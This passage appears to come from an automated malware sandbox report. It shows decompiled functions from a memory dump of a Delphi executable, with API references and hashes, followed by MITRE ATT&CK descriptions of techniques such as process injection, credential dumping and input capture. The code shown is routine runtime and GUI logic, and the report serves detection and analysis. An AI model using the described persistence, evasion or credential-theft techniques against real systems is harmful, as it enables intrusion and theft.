								if(_t81 <= 0) {
									L8:
									E0045E2A4(0, _t81, __eflags, _t107);
								} else {
									_t24 =  &_v16; // 0x45e239
									_t115 = _v12 - _t81 -  *_t24;
									if(_v12 - _t81 >=  *_t24) {
										goto L8;
									} else {
										_t26 =  &_v16; // 0x45e239
										E0045DAEC( *_t106, 4, 0, _t115, 1, _v12 -  *_t26);
									}
								}
							}
						}
						_t36 =  *((intOrPtr*)( *_t106 + 0x254)) + 0xfe - 2;
						if(_t36 < 0) {
							return E0045E2A4(1, MulDiv( *((intOrPtr*)( *_t106 + 0x25c)) -  *((intOrPtr*)( *_t106 + 0x23c)), 0x7f, _v20 -  *((intOrPtr*)( *_t106 + 0x23c))),  *((intOrPtr*)( *_t106 + 0x25c)) -  *((intOrPtr*)( *_t106 + 0x23c)), _t107);
						}
					}
				}
				return _t36;
			}

APIs

MulDiv.KERNEL32(?,0000007F,?), ref: 0045E459

Part of subcall function 0045E2A4: GetScrollPos.USER32(00000000,0000FFC8), ref: 0045E300
Part of subcall function 0045E2A4: SetScrollPos.USER32 ref: 0045E319

Strings

9E, xrefs: 0045E3D9, 0045E3E1, 0045E3E4

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Scroll
String ID: 9E
API String ID: 3938139061-2110824515
Opcode ID: ef076b6f91338936a2bb02e87197e972c589a1f9fb8b6cd06bf34d3e7bd53693
Instruction ID: de22b2d6b14abcdee14fd2ecfa3518816f25c4360ea5400ce03ee1d267647bf5
Opcode Fuzzy Hash: ef076b6f91338936a2bb02e87197e972c589a1f9fb8b6cd06bf34d3e7bd53693
Instruction Fuzzy Hash: D0414C35A001098FDB10DFADC588DAEB7F4EF18305F2045AAE984E7316DA35AE09CF48

Uniqueness

Uniqueness Score: -1.00%

Function 0040A56C, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040A56C(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				char _v297;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				void* _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				intOrPtr _v352;
				char _v356;
				char _v360;
				char _v364;
				void* _v368;
				char _v372;
				intOrPtr _t52;
				intOrPtr _t60;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_t108 = __edi;
				_v372 = 0;
				_v336 = 0;
				_v344 = 0;
				_v340 = 0;
				_v8 = 0;
				_push(_t113);
				_push(0x40a727);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffe90;
				_t89 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
					_t52 =  *0x491120; // 0x4075b0
					E00406548(_t52,  &_v8);
				} else {
					_t86 =  *0x4912a0; // 0x4075a8
					E00406548(_t86,  &_v8);
				}
				_t110 =  *((intOrPtr*)(_t89 + 0x18));
				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
					_v368 =  *(_t89 + 0xc);
					_v364 = 5;
					_v360 = _v8;
					_v356 = 0xb;
					_v352 = _t110;
					_v348 = 5;
					_t60 =  *0x4911f4; // 0x407550
					E00406548(_t60,  &_v372);
					E0040A194(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
				} else {
					_v332 =  *(_t89 + 0xc);
					_v328 = 5;
					E004045B0( &_v340, 0x105,  &_v297);
					E00408AA4(_v340,  &_v336);
					_v324 = _v336;
					_v320 = 0xb;
					_v316 = _v8;
					_v312 = 0xb;
					_v308 = _t110;
					_v304 = 5;
					_t82 =  *0x491198; // 0x407600
					E00406548(_t82,  &_v344);
					E0040A194(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
				}
				_pop(_t101);
				 *[fs:eax] = _t101;
				_push(E0040A72E);
				E00404348( &_v372);
				E0040436C( &_v344, 3);
				return E00404348( &_v8);
			}

APIs

VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040A727), ref: 0040A5D7
GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040A727), ref: 0040A5F9

Part of subcall function 00406548: LoadStringA.USER32 ref: 00406579

Strings

Pu@, xrefs: 0040A6D8

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: FileLoadModuleNameQueryStringVirtual
String ID: Pu@
API String ID: 902310565-3077127041
Opcode ID: 02156adca1f585b11c0c4578929e0c4ae99548c1f3482961343618982b328d77
Instruction ID: 240e037d2e4fdf7a2f2a9f7972edbd4e2c0b15f25f5dccbaf71f1a2df42bcb43
Opcode Fuzzy Hash: 02156adca1f585b11c0c4578929e0c4ae99548c1f3482961343618982b328d77
Instruction Fuzzy Hash: 8E410570900668DFDB61DF64CD81BDAB7F4AB49304F4040EAE908AB395D778AE84CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00424344, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00424344(intOrPtr __eax, void* __edx, void* __edi) {
				intOrPtr _v8;
				char _v92;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t41;
				void* _t43;
				intOrPtr _t52;
				intOrPtr _t57;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t64;
				void* _t66;
				intOrPtr _t67;

				_t59 = __edi;
				_t64 = _t66;
				_t67 = _t66 + 0xffffffa8;
				_push(_t60);
				_t43 = __edx;
				_v8 = __eax;
				if(__edx == 0) {
					L2:
					_push(0x492a44);
					L004068AC();
					_push(_t64);
					_push(0x4243fc);
					_push( *[fs:eax]);
					 *[fs:eax] = _t67;
					if(_t43 == 0) {
						E00402EF0( &_v92, 0x54);
						E00424D68(_v8, _t43, 0, 0, _t59, _t60, 0, 0,  &_v92);
					} else {
						_t61 = _t43;
						E004237F8( *((intOrPtr*)(_t61 + 0x28)));
						E004237FC( *((intOrPtr*)(_v8 + 0x28)));
						 *((intOrPtr*)(_v8 + 0x28)) =  *((intOrPtr*)(_t61 + 0x28));
						 *((char*)(_v8 + 0x21)) =  *((intOrPtr*)(_t61 + 0x21));
						 *((intOrPtr*)(_v8 + 0x34)) =  *((intOrPtr*)(_t61 + 0x34));
						 *((char*)(_v8 + 0x38)) =  *((intOrPtr*)(_t61 + 0x38));
					}
					_pop(_t52);
					 *[fs:eax] = _t52;
					_push(E00424403);
					_push(0x492a44);
					L004069F4();
					return 0;
				} else {
					_t57 =  *0x41e494; // 0x41e4e0
					if(E00403768(__edx, _t57) == 0) {
						_t41 = E00414A88(_v8, _t43);
						return _t41;
					} else {
						goto L2;
					}
				}
			}

APIs

RtlEnterCriticalSection.KERNEL32(00492A44), ref: 0042436F
RtlLeaveCriticalSection.KERNEL32(00492A44,00424403,00000000,004243FC,?,00492A44), ref: 004243F6

Part of subcall function 00424D68: RtlEnterCriticalSection.KERNEL32(00492A44,00000000,?,?), ref: 00424E0B
Part of subcall function 00424D68: RtlLeaveCriticalSection.KERNEL32(00492A44,00424E56,00492A44,00000000,?,?), ref: 00424E49

Strings

A, xrefs: 00424357

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave
String ID: A
API String ID: 3168844106-2078354741
Opcode ID: 2be02bd0951b54f05d6a4697f063ef31634a22b8b0d7236929331057d0209b4d
Instruction ID: e4c60fae559a079f8f962c10c3cb4d28f77953d953f980d94cfa5674b0fd86e4
Opcode Fuzzy Hash: 2be02bd0951b54f05d6a4697f063ef31634a22b8b0d7236929331057d0209b4d
Instruction Fuzzy Hash: 0F212C757042459FCB10DF99D98299EB7F5FF8C310BA041BAE80493752C674DE01DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0044874C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044874C(void* __eax, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				intOrPtr* _t27;
				intOrPtr _t29;
				void* _t39;
				intOrPtr _t42;
				intOrPtr _t45;
				int _t50;
				void* _t51;

				_t51 = __eax;
				_t39 = 0;
				_t50 = E00448690(__eax, 1, __edx);
				if(_t50 == 0) {
					if(( *(_t51 + 0x1c) & 0x00000010) == 0) {
						_t45 =  *0x4445d8; // 0x444624
						if(E00403768(_t51, _t45) != 0) {
							E00447764( *((intOrPtr*)(_t51 + 0x34)));
						}
					}
				} else {
					if(( *(_t50 + 0x1c) & 0x00000010) == 0) {
						E00447764(_t50);
					}
					 *((intOrPtr*)( *_t50 + 0x44))();
					_t24 = E00447DFC(_t50, _t39, 0, _t50, _t51);
					if((_t24 | E004482F8(_t50, 0)) != 0) {
						E004457D4(_t50, 0);
					}
					_t27 =  *0x49111c; // 0x492c04
					_t29 =  *((intOrPtr*)( *_t27 + 0x44));
					if(_t29 != 0) {
						_t42 = _t29;
						if( *((char*)(_t42 + 0x22f)) == 2 && _t50 ==  *((intOrPtr*)(_t42 + 0x258)) && SendMessageA( *(_t42 + 0x254), 0x234, 0, 0) != 0) {
							DrawMenuBar(E0043C1F4(_t42));
						}
					}
					_t39 = 1;
				}
				return _t39;
			}

APIs

SendMessageA.USER32(?,00000234,00000000,00000000), ref: 004487D2
DrawMenuBar.USER32(00000000,?,00000234,00000000,00000000), ref: 004487E3

Strings

$FD, xrefs: 004487F4

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: DrawMenuMessageSend
String ID: $FD
API String ID: 2625368238-395794980
Opcode ID: d2d2ccfdfaaae11247bacaee34b8040d9b1ea4ac6513cfff3c17b8ffe6846643
Instruction ID: 09470d85930791357d69d9dfc81ff92af356171fadd1370cda87ce25fedad38f
Opcode Fuzzy Hash: d2d2ccfdfaaae11247bacaee34b8040d9b1ea4ac6513cfff3c17b8ffe6846643
Instruction Fuzzy Hash: 72116A347046405BFA10EA2A8C8576AA7965F95318F19407BF9009B396DE7CEC069B58

Uniqueness

Uniqueness Score: -1.00%

Function 0044C628, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
threadCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E0044C628(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _t13;
				intOrPtr _t17;
				intOrPtr _t24;
				char _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				void* _t31;
				void* _t32;
				intOrPtr _t33;

				_t31 = _t32;
				_t33 = _t32 + 0xfffffff4;
				_v8 = 0;
				_t24 =  *0x476b54; // 0x0
				_v12 = _t24;
				_t25 =  *0x476b60; // 0x0
				_v16 = _t25;
				 *0x476b54 = __eax;
				 *0x476b60 = 0;
				_push(_t31);
				_push(0x44c6cb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t33;
				_push(_t31);
				_push( *[fs:eax]);
				 *[fs:eax] = _t33;
				EnumThreadWindows(GetCurrentThreadId(), E0044C5D8, 0);
				_t13 =  *0x476b60; // 0x0
				_v8 = _t13;
				_pop(_t26);
				 *[fs:eax] = _t26;
				_t27 = 0x44c694;
				 *[fs:eax] = _t27;
				_push(0x44c6d2);
				_t5 =  &_v16; // 0x42ef7e
				 *0x476b60 =  *_t5;
				_t17 = _v12;
				 *0x476b54 = _t17;
				return _t17;
			}

APIs

GetCurrentThreadId.KERNEL32 ref: 0044C677
EnumThreadWindows.USER32(00000000,0044C5D8,00000000), ref: 0044C67D

Strings

~B, xrefs: 0044C6BA

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$CurrentEnumWindows
String ID: ~B
API String ID: 2396873506-157790649
Opcode ID: 73e4e1a1b6c12227e349ce7bbc583cb705b52ea44075890c7d2db7c9450a1e17
Instruction ID: 7c32539eb726ed1d4ae04739d1d36bde6d3191d9a6b0475311cdfb1f963f555f
Opcode Fuzzy Hash: 73e4e1a1b6c12227e349ce7bbc583cb705b52ea44075890c7d2db7c9450a1e17
Instruction Fuzzy Hash: 660196B4A05B04AFE301CF66DD61959BBFAF78A710723C476E808D3750E7386810CA1C

Uniqueness

Uniqueness Score: -1.00%

Function 004260FC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E004260FC() {
				int _t2;
				intOrPtr _t5;
				int _t8;
				signed int _t10;
				char _t11;

				_t2 =  *0x492a30; // 0x60
				 *0x4764ec =  ~(MulDiv(8, _t2, 0x48));
				_t5 =  *0x49129c; // 0x4927f0
				if( *((char*)(_t5 + 0xc)) != 0) {
					_t11 = E004260B8();
					_t5 = _t11 - 0x80;
					if(_t5 == 0) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t8 =  *0x492a30; // 0x60
						_t10 =  ~(MulDiv(9, _t8, 0x48));
						 *0x4764ec = _t10;
						 *0x4764f2 = _t11;
						return _t10;
					}
				}
				return _t5;
			}

APIs

MulDiv.KERNEL32(00000008,00000060,00000048), ref: 00426109

Part of subcall function 004260B8: GetDC.USER32(00000000), ref: 004260C1
Part of subcall function 004260B8: SelectObject.GDI32(00000000,058A00B4), ref: 004260D3
Part of subcall function 004260B8: GetTextMetricsA.GDI32(00000000), ref: 004260DE
Part of subcall function 004260B8: ReleaseDC.USER32 ref: 004260EE

MulDiv.KERNEL32(00000009,00000060,00000048), ref: 00426145

Strings

MS Sans Serif, xrefs: 00426132

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsObjectReleaseSelectText
String ID: MS Sans Serif
API String ID: 2013942131-1665085520
Opcode ID: 2cb45da4d2254a0ee0866c64ec343cfeccadc25e4d251b290f8d7bb2f501de4d
Instruction ID: 1fe7725e697bde746ceba59c12cbc2dd289ec34200c7d440687e8b57dcca642f
Opcode Fuzzy Hash: 2cb45da4d2254a0ee0866c64ec343cfeccadc25e4d251b290f8d7bb2f501de4d
Instruction Fuzzy Hash: 7BF090717405145FD361EB6DAC42F662696974B710F46803EB10CDA292C29658048F2C

Uniqueness

Uniqueness Score: -1.00%

Function 00456188, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00456188(int __eax) {
				int _t4;
				int _t11;

				_t4 = __eax;
				_t11 = __eax;
				_t12 =  *((intOrPtr*)(__eax + 0x84));
				if( *((intOrPtr*)(__eax + 0x84)) != 0) {
					_t4 = E0043C4F8(_t12);
					if(_t4 != 0) {
						_t4 = IsWindowVisible(E0043C1F4( *((intOrPtr*)(_t11 + 0x84))));
						if(_t4 != 0) {
							return ShowWindow(E0043C1F4( *((intOrPtr*)(_t11 + 0x84))), 0);
						}
					}
				}
				return _t4;
			}

0x00456188
0x0045618a
0x0045618c
0x00456194
0x00456198
0x0045619f
0x004561ad
0x004561b4
0x00000000
0x004561c4
0x004561b4
0x0045619f
0x004561cb

APIs

IsWindowVisible.USER32(00000000), ref: 004561AD
ShowWindow.USER32(00000000,00000000,?,dZG,004561DC,00000000,004552C7,?,?,dZG,00000001,00455387,?,?,?,dZG), ref: 004561C4

Strings

dZG, xrefs: 00456188

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ShowVisible
String ID: dZG
API String ID: 4185057100-410245891
Opcode ID: e7b5841ee6f6c1e4db26ffb880ef901477c0ab628b67a40c463d79075b649659
Instruction ID: d8f9f2cca3db28591ab6c68512187d621f030eca5fe2269429791bb322129600
Opcode Fuzzy Hash: e7b5841ee6f6c1e4db26ffb880ef901477c0ab628b67a40c463d79075b649659
Instruction Fuzzy Hash: A9E0867170051147DE107A664DC2BAB13485F04709F0515BFBD04FF247CE2C9C0857B8

Uniqueness

Uniqueness Score: -1.00%

Function 004065F5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004065F5(void* __eax, void* __ebx, void* __esi) {
				long _t10;

				 *((intOrPtr*)(__ebx + 0x69)) =  *((intOrPtr*)(__ebx + 0x69)) + __esi;
				 *0x476008 = 2;
				 *0x49204a = 2;
				 *0x492000 = E004052D0;
				if(E00403424() != 0) {
					_t5 = E00403454();
				}
				E00403518(_t5);
				 *0x492050 = 0xd7b0;
				 *0x49221c = 0xd7b0;
				 *0x4923e8 = 0xd7b0;
				E004051C8();
				 *0x49203c = GetCommandLineA();
				 *0x492038 = E004013B0();
				_t10 = GetCurrentThreadId();
				 *0x492030 = _t10;
				return _t10;
			}

0x004065fa
0x004065fd
0x00406604
0x0040660b
0x0040661c
0x0040661e
0x0040661e
0x00406623
0x00406628
0x00406631
0x0040663a
0x00406643
0x0040664d
0x00406657
0x0040665c
0x00406661
0x00406666

APIs

Part of subcall function 00403424: GetKeyboardType.USER32(00000000), ref: 00403429
Part of subcall function 00403424: GetKeyboardType.USER32(00000001), ref: 00403435

GetCommandLineA.KERNEL32 ref: 00406648
GetCurrentThreadId.KERNEL32 ref: 0040665C

Part of subcall function 00403454: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403476
Part of subcall function 00403454: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004034C5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004034A9
Part of subcall function 00403454: RegCloseKey.ADVAPI32(?,004034CC,00000000,?,00000004,00000000,004034C5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004034BF

Strings

`&b, xrefs: 0040664D

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: KeyboardType$CloseCommandCurrentLineOpenQueryThreadValue
String ID: `&b
API String ID: 3316616684-3623129442
Opcode ID: 56c6e909325c70cd11ad151eff35aecf9e6bda53e31f071cf4ccc768fb0614b0
Instruction ID: f85c887000639c39bbf2d6e02aa4c25035bb1959f36ddebc80d248bb8db5abf9
Opcode Fuzzy Hash: 56c6e909325c70cd11ad151eff35aecf9e6bda53e31f071cf4ccc768fb0614b0
Instruction Fuzzy Hash: 4BF0A260811741B9E700FF665A8A20A3F61AF22349B40457FA5407A3B3EBFD4155CB9E

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
